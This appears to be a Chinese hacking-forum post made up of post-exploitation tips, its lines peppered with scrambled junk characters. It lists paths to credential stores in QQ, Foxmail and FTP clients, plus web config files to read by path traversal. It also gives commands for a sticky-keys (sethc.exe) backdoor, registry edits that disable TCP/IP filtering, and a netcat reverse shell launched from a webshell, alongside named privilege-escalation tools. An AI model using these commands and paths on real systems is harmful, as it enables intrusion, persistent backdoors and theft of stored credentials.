/ p6 g' U8 }) Z% b6 X/usr/share/tomcat6/bin/startup.sh
$ Y& K1 F: Z$ \/usr/tomcat6/bin/startup.sh
( n5 t. b- @2 c. p$ L5 lc:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
; M! ~: I) w! i+ r8 wc:\Program Files\Tencent\qq\bin\qq.exe
$ X% L& T% \1 V$ zc:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
# q  c9 h* E  I' ^( N; I$ Vc:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
8 ]6 s$ p" a0 P1 ZC:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
3 D9 Q5 h$ P" x7 @% S4 h8 D. d2 [3 tc:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
, o' X) o  W3 }% x# w$ `  }C:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
7 \9 R1 K9 R! w& ^, ]" vC:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
' ^/ i$ Q; J/ `3 zc:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
# _% w2 Z2 s: ~( x0 o/ ~8 pC:\Program Files\FlashFXP\FlashFXP.ini
! Y* [$ p& z* g6 M7 f# uC:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
, ~4 K  _. D! g$ kC:\Program Files\StormII\Storm.exe

- N. U: X# h' o5 |1 C$ b+ c3.网站相对路径:
0 q& D: T) N, f4 G
2 {  r3 ~" J$ @2 f/config.php
../../config.php
../config.php
0 }3 _5 S7 }7 N+ X../../../config.php
+ ?8 _, ~4 v% _/ S  E1 ~4 {  E/config.inc.php
./config.inc.php
: e2 b% f- h( w: G& X* a../../config.inc.php
../config.inc.php
../../../config.inc.php
# q) v( F1 V% K/conn.php
./conn.php
../../conn.php
' ~- }7 v  {4 V* X../conn.php
0 U7 H4 g' O) e2 O/ i4 R../../../conn.php
' z; h# R( o. o: `* m/conn.asp
./conn.asp
; D- }& B: c  P$ o../../conn.asp
$ U# A" q. A9 O: \8 a: M../conn.asp
../../../conn.asp
  S3 j- u! a$ `) W/config.inc.php
+ B! O0 Y- g9 r* y% b3 k( ~) B./config.inc.php
3 {2 ]- w" D: T+ V9 n3 M../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
4 Y# U: E" ]5 y+ s0 Q../config/config.php
2 U+ j7 R  x( v: V5 e../../../config/config.php
0 z; |1 Z! j$ H/ n8 H$ w& d/config/config.inc.php
0 J, \+ o' N& U5 Q8 P./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
2 W4 K' P/ w. l4 j8 B. I: ^../../../config/config.inc.php
/config/conn.php
./config/conn.php
& \% G; I5 S' `* S0 k../../config/conn.php
0 [" ~' h6 @8 `. K../config/conn.php
../../../config/conn.php
5 R: B1 V3 _* t- c0 s- i/config/conn.asp
+ {* O* T$ i* z./config/conn.asp
../../config/conn.asp
../config/conn.asp
2 r5 ?" x# n6 Y' u  ~../../../config/conn.asp
/config/config.inc.php
9 G( Y8 V- M/ U* F4 g2 l./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
: y  B( ^9 i/ c4 j! B5 r../../../config/config.inc.php
, v2 J, F& ], p. h  c7 g( c/data/config.php
../../data/config.php
../data/config.php
/ S% _6 a8 X9 I# J3 Z8 Z../../../data/config.php
/data/config.inc.php
" D3 z. p: N: o8 s5 Y' W5 q./data/config.inc.php
../../data/config.inc.php
( C! U$ S" f  p7 t9 L1 R../data/config.inc.php
$ c. a& a7 a. d1 p8 h) ^) Q../../../data/config.inc.php
2 w( {6 N9 F. \: f/data/conn.php
./data/conn.php
../../data/conn.php
9 B$ F9 ], o  x0 Q  ~7 E) F# {../data/conn.php
0 _3 Z, p- @, P. G& R$ |8 B- i../../../data/conn.php
+ o3 `; l! f" t$ J, N/data/conn.asp
6 T  @; a$ E: g2 i. N! t./data/conn.asp
+ l& Y6 i5 m# |& S, Z) U../../data/conn.asp
$ i: F) W" |$ J# G. @; \8 V- V9 Q7 P+ N../data/conn.asp
1 K6 m2 a& K! i$ m../../../data/conn.asp
" k5 O; e9 k5 C# ?  Y, ]' k/data/config.inc.php
! a0 T; ?2 p( {" [4 U./data/config.inc.php
& L% G- I% O4 }1 Q$ s; b../../data/config.inc.php
3 X3 t3 x0 g. u8 W( G  q../data/config.inc.php
../../../data/config.inc.php
/include/config.php
5 V* ^% ?5 c9 Y% S5 c3 k( S  m1 k; {../../include/config.php
../include/config.php
5 G0 v2 X" u" B../../../include/config.php
, ?4 C, }- f) p+ o2 ?; X/include/config.inc.php
./include/config.inc.php
# W( s6 r& \5 j' o../../include/config.inc.php
../include/config.inc.php
  }; @+ G; B( K/ C! u../../../include/config.inc.php
+ m& D5 Q% y) p% K. q6 a/include/conn.php
./include/conn.php
) L* l3 ]; L" e" q../../include/conn.php
../include/conn.php
' K4 A5 ~0 z/ L9 p1 a* ?+ I../../../include/conn.php
. {5 t. w% W2 z8 [' C1 L  m* W/include/conn.asp
./include/conn.asp
: Q; q$ X. a% k; e- Y../../include/conn.asp
2 I+ ]' Q, i! T$ J- a/ U/ J) h: A../include/conn.asp
4 l0 K! ?- f5 {, o  O. S../../../include/conn.asp
* Z. x, H3 }- y8 W. _7 L" w. I* D/include/config.inc.php
- X3 E% ^9 D0 `, q6 \% I& ?./include/config.inc.php
../../include/config.inc.php
1 e+ W9 I/ y" R/ \& v& {, d../include/config.inc.php
../../../include/config.inc.php
/ t7 A' U8 W1 ?7 X7 B1 f8 ^/inc/config.php
$ ^- _( x7 R) I% @../../inc/config.php
../inc/config.php
../../../inc/config.php
; x# A; P$ p" Y! e7 G/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
1 G$ T) \9 D! \0 W/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
6 b% e* J$ X# f9 J  H../../../inc/config.inc.php
; I% ]; @" k* t  U3 T: W2 k/index.php
& r3 A% F) H' r2 r' [- A( C. l4 @./index.php
0 Q# R( `' O  @, u' G+ n" v../../index.php
../index.php
6 h: i* P7 B! k$ Z../../../index.php
4 \. t  E; ]3 D0 W  \3 w+ Y/index.asp
./index.asp
../../index.asp
( r% }: B& {0 U. F6 L1 u( Q../index.asp
( R! F3 P  t0 b  \' s../../../index.asp
替换SHIFT后门
, z6 s/ A" G2 f　attrib c:\windows\system32\sethc.exe -h -r -s
) ^* g/ b2 U, N/ t( `
" P4 v/ ]7 U7 T2 I. m! i6 V　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

+ J' D6 V0 r, ]' ]0 `1 f3 X7 ]* n0 R　　del c:\windows\system32\sethc.exe

　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
: j0 x$ D6 J( W
　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

　　attrib c:\windows\system32\sethc.exe +h +r +s

　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
去除TCPIP筛选
TCP/IP筛选在注册表里有三处，分别是：
* y+ m% x0 N: ?8 X' m( Y* B: t3 MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% Z' n  Y8 K6 A- u; V+ d9 Z" THKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# q% m7 D+ {! \  {/ p2 R
分别用
) U8 k/ r: w- `' {6 s: qregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
  W: g$ _' [2 l" i" S0 z* E  E& gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 j/ T1 L  K# `1 j命令来导出注册表项
4 b8 y! u! S3 A% O
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

9 L* z7 j# h0 H7 A( a, F再将以上三个文件分别用
6 B; q" y7 B3 U" s9 }  G$ k# k9 e9 {regedit -s D:\a.reg
regedit -s D:\b.reg
( L4 |7 i3 Z8 t9 E2 r+ Y1 d) O4 gregedit -s D:\c.reg
导入注册表即可

webshell提权小技巧
1 h9 Q2 b8 [+ p7 Z" f! X* hcmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
/ l0 Z' p0 C' \: ?1 D"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
% I$ j3 r3 z1 @8 n* r$ {/ Y; S( w通常都不会成功。
7 d) f1 G* n2 O6 ?- y2 H
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
6 {3 o2 ~. j% x+ b' x/ U6 k却能成功。。
& O7 v- E: h; b5 F& N: y0 ?0 w这个不是重点
* w7 m( V- H3 e6 M9 w9 k5 C我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2